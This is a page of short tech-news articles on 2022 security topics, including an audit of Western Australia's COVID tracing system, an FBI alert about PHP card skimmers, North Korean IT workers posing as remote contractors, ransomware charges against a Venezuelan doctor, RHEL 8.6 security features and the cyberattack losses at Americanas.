Information Technology

Written by

Chris Duckett, APAC Editor

Chris Duckett
APAC Editor

Chris started his journalistic adventure in 2006 as the Editor of Builder AU after originally joining CBS as a programmer. After a Canadian sojourn, he returned in 2011 as the Editor of TechRepublic Australia, and is now the Australian Editor of ZDNet.

Full Bio

Perth city
Image: Getty Images
The Auditor-General of Western Australia has once again given state authorities a whack for security weaknesses in IT systems used in the state, with a report on its Public Health COVID Unified System (PHOCUS) tabled on Wednesday. PHOCUS is used within WA to record and track and trace positive COVID cases in the state, and can contain personal information such as case interviews, phone calls, text messages, emails, legal documents, pathology results, exposure history, symptoms, existing medical conditions, and medication details. The cloud system can also draw information in from the SafeWA app on check-ins — which the Auditor-General previously found WA cops were able to access — as well as from flight manifests, transit cards, business employee and customer records, G2G border-crossing pass data, and CCTV footage. The report found WA Health only used encryption in its test environment, was not able to tell if malicious activity was occurring, and lacked a contract management plan with its vendor. “WA Health did not keep logs of user ‘view’ access to information in PHOCUS. Only ‘edits’ (changes or deletions) to information in the system were logged but WA Health did not monitor these logs for inappropriate activity,” the report said. “WA Health will not know if personal or medical information is inappropriately accessed (viewed or edited by WA Health staff or their third party vendors). “Following our audit enquiries, WA Health advised us they have now implemented a process to monitor edit access (data changes), but had not implemented a process to log view access (to detect snooping) due to perceived system performance issues.” The department also encrypted personal and medical information after the audit, increased data masking to all information in its test environment, and implemented a file upload denylist and brought a malware scanner online after the Auditor-General found potentially malicious files could be uploaded to the system. “There were no data loss prevention controls in place to prevent unauthorised sharing of personal and medical information in PHOCUS, and WA Health did not monitor documents shared with external and unauthenticated parties. Poor controls can result in unauthorised disclosure of sensitive information and reputational damage to WA Health,” the report said. Further, the report said WA Health’s third-party vendor had full access to the information in the production environment, which WA Health said was assessed and balanced against the need to build the system quickly; two administrator accounts were left over from a previous vendor; and vendor contracts lacked “important security requirements”. In response to the audit, WA Health said due to implementing four other COVID-related systems at the same time, the issues were appropriately managed and balanced development speed, quality, and resource demands. “No breach of privacy has occurred in relation to the system, continuous data cleansing and quality checking is undertaken, no inaccuracies in case status impacting management were found and no inappropriate use of the system was recorded,” the department said. “This demonstrates the robustness of PHOCUS and that the data is well managed and secure.” Related CoverageWA government allocates AU$25.5m to expand cybersecurity servicesThe Office of Digital Government’s cybersecurity unit will score additional personnel under the funding.Auditor finds WA Police accessed SafeWA data 3 times and the app was flawed at launchWA Health released SafeWA check-in information for purposes other than COVID-19 contact tracing, with six requests being made by the police despite government messaging that the information would only be used to support contact tracing.WA Auditor-General drags local governments over horrendous cyber risk managementUsage of out-of-date software came in for special treatment from the Western Australia Auditor-General, with one entity vulnerable to a 15-year vulnerability.Western Australia sets out digital to-do list in first roadmap releaseThe hard border state is running 22 projects across 12 government agencies to get it a step closer to achieving its whole-of-government digital strategy.328 weaknesses found by WA Auditor-General in 50 local government systemsThe computer systems of 50 Western Australian local government entities were probed and the result was the finding of 328 control weaknesses, with 33 considered as significant by the Auditor-General. More

Written by

Adrian Kingsley-Hughes, Contributor

Adrian Kingsley-Hughes
Contributor

Adrian Kingsley-Hughes is an internationally published technology author who has devoted over two decades to helping users get the most from technology — whether that be by learning to program, building a PC from a pile of parts, or helping them get the most from their new MP3 player or digital camera. Adrian has authored/co-authored technical books on a variety of topics, ranging from programming to building and maintaining PCs.

Full Bio

The use of Chromebooks is exploding. During the past couple of years, they became (and continue to be) the go-to cheap hardware for people working remotely.This has resulted, however, in piles and piles of Chromebooks that need their data securely wiped, either to put them back into service or to allow them to be disposed. But sanitizing the data on Chromebooks can be a pain.

Until now.Blancco has announced that Blancco Drive Eraser now supports Chromebook data sanitization. The new support allows a wide range of organizations — enterprises, IT Asset Disposition service providers, academic institutions, etc. — with an easy-to-use, fast, and secure data sanitization specifically for Chromebooks. Blancco Drive Eraser has been designed to decreases the amount of time needed to erase each device while still allowing the preservation of its native operating system, which speeds up the preparation of each Chromebook for reuse. Once data has been thoroughly erased, Blancco Drive Eraser then confirms that the data sanitization has been completed successfully. It provides a tamper-proof, digitally-signed certificate of erasure to support any regulatory compliance and reporting mandates.”While most students have returned to the classroom and employees are increasingly coming back to offices, the demand for Chromebooks has not waned,” said Alan Bentley, Blancco’s President of Global Strategy. “One forecast predicts nearly 30 million Chromebooks will be shipped globally in 2022 — a decrease of 21 percent from 2021 but more than double the number of units recorded in 2019,” Bentley added, “As more of these devices enter the ecosystem, and as more organizations look to be participants in the circular economy, they need a solution that allows them to quickly and safely reuse these devices. Blancco Drive Eraser now meets that need.”One of Blancco Drive Eraser’s main selling points is that it protects personally identifiable information (PII).”We are now able to give… organizations the ability to ensure device data is rendered completely unrecoverable. This capability allows them to confidently reuse or sell end-of-life devices instead of adding to the growing electronic waste crisis in our landfills,” Bentley said.Secure data sanitization for Chromebook is now available as part of Blancco Drive Eraser at no extra cost. More

The Federal Bureau of Investigations (FBI) is warning that someone is scraping credit card data from the checkout pages of US businesses’ websites. “As of January 2022, unidentified cyber actors unlawfully scraped credit card data from a US business by injecting malicious PHP Hypertext Preprocessor (PHP) code into the business’ online checkout page and sending the scraped data to an actor-controlled server that spoofed a legitimate card processing server,” the FBI said in an alert.

It said the “unidentified cyber actors” also established backdoor access to the victim’s system by modifying two files within the checkout page. SEE: Just in time? Bosses are finally waking up to the cybersecurity threatJavaScript-based Magecart card-skimming attacks have been the main threat to e-commerce sites in recent years, but PHP code remains a major source of card skimming activity. The attackers began targeting US businesses in September 2020 by inserting malicious PHP code into the customized online checkout pages. But earlier this year, the actors changed tactics using a different PHP function.  The actors create a basic backdoor using a debugging function that allows the system to download two webshells onto the US firm’s web server, giving the attackers backdoors for further exploitation. The FBI’s recommended mitigations include changing default login credentials on all systems, monitoring requests performed against your e-commerce environment to identify possible malicious activity, segregating and segmenting network systems to limit how easily cyber criminals can move from one to another, and securing all websites transferring sensitive information by using secure socket layer (SSL) protocol.Security firm Sucuri observed that 41% of new credit card skimming malware samples in 2021 were from PHP backend credit card skimmers. This suggested that solely scanning for frontend JavaScript infections could be missing a large proportion of credit card skimming malware. As Sucuri explains, webshell backdoors give attackers full access to the website file system, often providing a full picture of the environment, including the server operating system and PHP versions, as well powerful functionality to change permissions of files and move into adjacent websites and directories. Webshells accounted for 19% of 400 new malware signatures gathered by Sucuri in 2021. The firm saw a “hugely disproportionate” rise in signatures in 2021 for PHP-based credit card stealers impacting e-commerce platforms Magento, WordPress and OpenCart.    More

Skilled software and mobile app developers from North Korea are posing as US-based remote workers to land contract work as developers in US and European tech and crypto firms. The warning comes in a new joint advisory from The US Department of State, the US Department of the Treasury, and the Federal Bureau of Investigation (FBI) outlining the role North Korean IT workers play in raising revenue for North Korea, which contributes to its weapons of mass destruction (WMD) and ballistic missile programs, in violation of U.S. and UN sanctions.

ZDNet Recommends

Hackers working for North Korea – officially known as the Democratic People’s Republic of Korea (DPRK) – have gained notoriety for sophisticated hacks on cryptocurrency exchanges during the past five years. In 2021 alone they stole over $400 million worth of cryptocurrency for the DPRK. SEE: Just in time? Bosses are finally waking up to the cybersecurity threatThe FBI, US Cybersecurity and Infrastructure Security Agency (CISA), and Treasury last month warned that North Korea’s Lazarus Group, or APT 38, was targeting exchanges in the blockchain and cryptocurrency industry using spear-phishing campaigns and malware. Treasury also in April linked Lazarus to the $600 million heist in March from the Ronin blockchain network underpinning the play-to-earn game Axie Finity.  However, the skilled North Korean IT workers play another function for DPRK, using their access as sub-contracted developers within US and European contracting firms to enable DPRK-sponsored hacking. The US government has outlined “red flag” indicators that firms might be hiring North Korean freelance developers and tips to “protect against inadvertently hiring or facilitating the operations of DPRK IT workers.” “The DPRK dispatches thousands of highly skilled IT workers around the world to generate revenue that contributes to its weapons of mass destruction (WMD) and ballistic missile programs, in violation of U.S. and UN sanctions,” the advisory states. DPRK IT workers are primarily located in the People’s Republic of China (PRC) and Russia, but some are located in Africa and Southeast Asia, the US says. “The vast majority of [DPRK IT workers] are subordinate to and working on behalf of entities directly involved in the DPRK’s UN-prohibited WMD and ballistic missile programs, as well as its advanced conventional weapons development and trade sectors. This results in revenue generated by these DPRK IT workers being used by the DPRK to develop its WMD and ballistic programs, in violation of US and UN sanctions.” Rather than engaging directly in malicious cyber activity, DPRK IT workers use privileged access within contractor roles to provide logistical support to DPRK hackers by sharing access to virtual infrastructure, facilitating sales of stolen data, and assisting in DPRK’s money laundering and virtual currency transfers.”Although DPRK IT workers normally engage in IT work distinct from malicious cyber activity, they have used the privileged access gained as contractors to enable the DPRK’s malicious cyber intrusions. Additionally, there are likely instances where workers are subjected to forced labor,” the warning notes.A tight labor market coupled with high demand for software developers in the US and Europe are working in favor of North Korean software developers, who can earn at least ten times more than a conventional North Korean laborer working in a factory or on a construction project overseas. The list of roles that DPRK tech workers specialize in reflect the hottest areas of tech in the West and globally, including mobile and web apps, building crypto exchange platforms and digital coins, mobile games, online gambling, AI-related applications, hardware and firmware development, VR and AR programming, facial and biometric recognition software, and database development. The DPRK workers often take on projects that involve virtual currency in categories spanning business, health and fitness, social networking, sports, entertainment, and lifestyle, according to the advisory.SEE: Cloud computing security: New guidance aims to keep your data safe from cyberattacks and breachesUnsurprisingly, DPRK IT workers are using VPNs and third-country IP addresses to conceal their internet connections and avoid violating terms of service of online platforms they use. They’re also using proxy accounts to bid for work, and might use a dedicated device for banking services to evade anti-money laundering measures. And they’re using forged and stolen identity documents to hide their identity.   Red flags include: multiple logins into one account from various IP addresses linked to different countries in a short time; developers logging into multiple accounts on the same platform from one IP address; developers being logged into accounts continuously for one or more days at a time; router ports such as 3389 and other configurations associated with the use of remote desktop-sharing software; multiple developer accounts receiving high ratings from one client account in a short period; extensive budding on projects and a low number of accepted project bids; and frequent money transfers through payment platforms, especially to China-based bank accounts.       The advisory notes that DPRK IT workers employed by a US firm fraudulently charged its payment account $50,000 in 30 small installments over a matter of months. The US agencies recommend contracting firms conduct video interviews with applicants to verify their identity and to reject low-quality images as verification of identity.  More

Written by

Eileen Yu, Contributor

Eileen Yu
Contributor

Eileen Yu began covering the IT industry when Asynchronous Transfer Mode was still hip and e-commerce was the new buzzword. Currently an independent business technology journalist and content specialist based in Singapore, she has over 20 years of industry experience with various publications including ZDNet, IDG, and Singapore Press Holdings.

Full Bio

A higher number of organisations in Singapore are experiencing at least six cybersecurity incidents in the past year, compared to their counterparts across 10 other global markets. However, just 49% in the Asian nation are able to respond to a threat within 24 hours, compared to the global average of 70%. Some 65% of organisations in Singapore saw at least six security incidents, which was the highest amongst the 11 markets surveyed in a study commissioned by Infoblox that polled 100 respondents in the country. Globally, 46% of organisations encountered at least six security incidents. Conducted by CyberRisk Alliance’s Business Intelligence Unit, the survey had a total of 1,100 respondents from markets that also included Australia, Germany, the US, and UK.

In Singapore, 73% said cybersecurity incidents led to an actual breach, compared to 34% across the globe that saw at least one breach. Some 45% pointed to a cloud application or infrastructure as the source of a breach, while 42% cited an IoT device or network and 32% blamed an employee-owned endpoint device.  Globally, 32% said their organisation’s security breaches originated from Wi-Fi access points while 29% pointed to a cloud application or infrastructure. Another 29% cited an employee-owned endpoint device and 25% blamed a third-party or supply chain services provider. As a result of breaches, 57% in Singapore said hackers exposed sensitive data, while 53% suffered system outages or downtime and 43% had to deal with malware infections. The survey also found that 33% incurred losses–direct and indirect–of up to $1 million due to a security breach. Globally, this figure was a higher 43%, with respondents highlighting the associated cost of operating amidst the pandemic where more sensitive data had to be shared via multiple channels. Asked about challenges they faced safeguarding their network against attacks, 33% globally pointed to monitoring remote work access and 28% noted a lack of budget. In Singapore, 32% cited poor network visibility, while 32% highlighted a shortage of security skills and 28% faced budget restraints.Data leakage was the top cybersecurity concern for 51% of companies in Singapore, while 42% were anxious about remote connections and 35% felt the same about networked IoT attacks. Some 29% also expressed concerns about attacks through cloud services.Worldwide, data leakage also was the top concern for 49% of respondents, followed by ransomware at 39% and attacks via remote connections at 36%.To cope with the threat landscape, 73% in Singapore said their organisation had increased their IT security budgets last year, with another 69% expecting this upward trend to continue this year. Globally, 71% expected their IT security budgets to increase this year. Some 28% in Singapore said they would invest in DNS security, while 26% said likewise for network security tools. Another 37% would pump funds into data encryption and 36% were opting for cloud access security brokers. Some 60% currently tapped DNS controls as part of their cybersecurity strategy to block and flag malicious traffic and devices. Another 61% had implemented SASE (secure access service edge) infrastructures, with 29% indicating plans to do likewise.RELATED COVERAGE More

on May 16, 2022

| Topic: Legal

US prosecutors have accused 55-year-old Venezuelan cardiologist Moises Luis Zagala Gonzalez, also known as Nosophoros, Aesculapius and Nebuchadnezzar, of being the mastermind behind a slew of notorious ransomware.According to Justice Department officials, Zagala is alleged to have set up a cybercriminal enterprise in which he held an economic and reputational interest in his software being used in successful cyber attacks. “We allege Zagala not only created and sold ransomware products to hackers, but also trained them in their use. Our actions today will prevent Zagala from further victimizing users,” assistant director-in-charge Michael Driscoll said.”Many other malicious criminals are searching for businesses and organizations that haven’t taken steps to protect their systems — which is an incredibly vital step in stopping the next ransomware attack.” Some of Zagala’s associated ransomware products include Jigsaw, and private ransomware builder Thanos. Jigsaw has been around since 2016, and is known for its dramatic means of pressuring victims to pay up fast, stealing the idea from the 2004 movie Saw, where characters have to solve puzzles within a time limit or face fatal consequences. Meanwhile, Thanos — named presumably after the Marvel supervillain — first appeared in 2019, allowing users to build their own ransomware.In 2020, while investigating security incidents at several Israeli prominent organisations, security researchers from ClearSky and Profero said they linked the use of the Thanos ransomware to MuddyWater, a known Iranian state-sponsored hacking group.”Combating ransomware is a top priority of the Department of Justice and of this Office.  If you profit from ransomware, we will find you and disrupt your malicious operations,” said US Attorney Breon Peace. Despite this, if convicted, Zagala only faces up to five years’ imprisonment for attempted computer intrusion, and five years’ imprisonment for conspiracy to commit computer intrusions. Related Coverage More

Do you want a solid Linux distribution that also delivers the latest languages and solid security? Yes? Then consider getting Red Hat Enterprise Linux 8.6.Red Hat announced this new release at the Red Hat Summit. It has numerous new features, but the ones that caught my eye were the security improvements.

For example, if you’re serious about securing your Linux distribution, you should run Security-Enhanced Linux (SELinux). But, SELinux has long had a fundamental problem. Because its Common Intermediate Language (CIL) couldn’t store the module name and version in the module itself, there was no simple way to verify that the installed module was the right version. This kind of thing has become a common software chain supply security problem. Now, however, you can create a SHA256 hash checksum signature for your SELinux modules. You can then compare this with the original file’s checksum to make sure you’re actually using the correct SELinux configuration file. Continuing with configuration file security improvements, RHEL’s OpenSSH servers now support drop-in configuration files. The sshd_config file supports the Include directive. That means you can include configuration files in another directory. What makes this matter is that it makes it easier to apply system-specific configurations on OpenSSH servers by using automation tools such as Ansible Engine. It also makes it easier to organize different configuration files for different uses, such as filtering incoming connections.Libreswan, a popular open-source IPsec Virtual Private Network (VPN) server and Internet Key Exchange (IKE), has been rebased to upstream version 4.5. This includes many bug fixes and enhancements, such as the support of IKE version 2 for Labeled IPsec.This enables Libreswan to work better on SELinux systems.For SAP HANA users, the big news is there’s now a jointly-tested RHEL SAP HANA configuration with SELinux enabled. SELinux enables the server to automatically isolate processes. This, in turn, provides excellent privilege escalation attack protection.At a higher level, RHEL’s Web console now includes support for Smart Card Authentication with sudo and SSH. With the growing need for Two-Factor Authentication (2FA) this is a big step forward for improved day-to-day security.For developers, the biggest news is that RHEL 8.6 now comes with PHP 8 and Perl 5.32. It also includes support for GCC 11, LLVM 13.0.1, Rust 1.58.1, Go 1.17.7, OpenJDK 17, and Apache Log4j 2. In other words, it supports today’s most up-to-date languages.If you need high-availability (HA), RHEL 8.6 also comes with a HA Cluster System Role. This makes it much easier to create more consistent and stable RHEL HA clusters solutions.Life is also easier for SAP HANA users because SAP day-1 Automation uses the Red Hat Ansible Automation Platform to automate SAP HANA setup and configurations. Additionally, these new RHEL system roles are now available as Ansible collections, providing organizations with more flexibility to consume SAP automation content. All these SAP HANA improvements make RHEL much more competitive with SUSE SAP HANA offerings.Put it all together and what you get is a great, solid enterprise Linux for Red Hat users on everything from a simple server in the backroom to the data center to the public cloud to the hybrid cloud and beyond.RHEL 8.6 is available now for everyone with an active RHEL subscription. Don’t have one and want to give the latest RHEL a try? You can download a 60-day evaluation edition of RHEL 8.6 to see if it works for you. Related Stories: More

Written by

Angelica Mari, Contributing Editor

Angelica Mari
Contributing Editor

Angelica Mari is a Brazil-based technology journalist. She started working at age 15 as a computer instructor and started writing professionally about technology two years later.

Full Bio

Brazilian e-commerce conglomerate Americanas.com reported a multimillion-dollar loss in sales in its financial results on Friday after a major cyberattack earlier this year. The company lost 923 million Brazilian reais ($183 million) in sales after two attacks that took place between February 19 and 20 and rendered its e-commerce operation unavailable. According to the company, physical stores continued to operate and the logistics arm of the company continued to deliver orders placed after the event.

“In order to add strength to our internal team and security partner companies in the resolution and investigation of this incident, we called on world-renowned experts with experience in situations like these,” the company said in its financial statement. According to Americanas, the operations started to be gradually restored on February 23 and activities fully resumed on the following day. “There is no evidence of other damages, beyond the fact that our e-commerce operations were suspended,” the firm noted. Despite the impact caused by the incident, the company reported a 22% increase in total sales compared to the same period last year. According to the firm’s results, digital sales increased 20% in the first quarter of the year as the pace of sales resumed in the weeks following the incident. The company noted that if the cyberattack hadn’t happened, sales growth would have reached 30%. The authors of the Americanas attack are understood to be the Lapsus$ Group — the group responsible for a major ransomware attack against Brazil’s Ministry of Health in December 2021 that resulted in the unavailability of the COVID-19 vaccination data of millions of citizens. According to analyst firm IDC, overall IT security spending is expected to reach nearly $1 billion in Brazil this year, an increase of 10% in relation to 2020. The research company predicts that 2022 will see firms dealing with an increasing number of cyberattacks, a trend that has gathered pace since the start of the COVID-19 pandemic.

ZDNet Recommends More